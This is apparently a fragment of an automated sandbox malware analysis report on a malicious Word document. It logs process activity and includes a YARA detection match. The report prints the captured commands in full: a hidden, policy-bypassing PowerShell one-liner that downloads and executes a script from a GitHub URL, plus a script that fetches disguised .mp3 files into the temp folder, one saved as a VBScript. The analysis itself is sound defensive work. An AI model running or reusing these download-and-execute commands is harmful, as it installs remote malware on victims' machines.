                                                                                                                                            Data Ascii: cd $Env:TempInvoke-WebRequest -Uri "http://github.com/ssbb36/stv/raw/main/2.mp3" -OutFile "temp54685"Invoke-WebRequest -Uri "https://github.com/ssbb36/stv/raw/main/1.mp3" -OutFile "end.vbs"Invoke-WebRequest -Uri "http://github.com/ssbb36/stv/raw/main/3


                                                                                                                                            Code Manipulations

                                                                                                                                            Statistics

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Start time:01:49:15
                                                                                                                                            Start date:04/11/2021
                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                            Imagebase:0x13fc80000
                                                                                                                                            File size:1423704 bytes
                                                                                                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:01:49:18
                                                                                                                                            Start date:04/11/2021
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
                                                                                                                                            Imagebase:0x13f590000
                                                                                                                                            File size:473600 bytes
                                                                                                                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000002.418320805.0000000000250000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                                            Reputation:high

                                                                                                                                            Disassembly

                                                                                                                                            Code Analysis

                                                                                                                                            Reset < >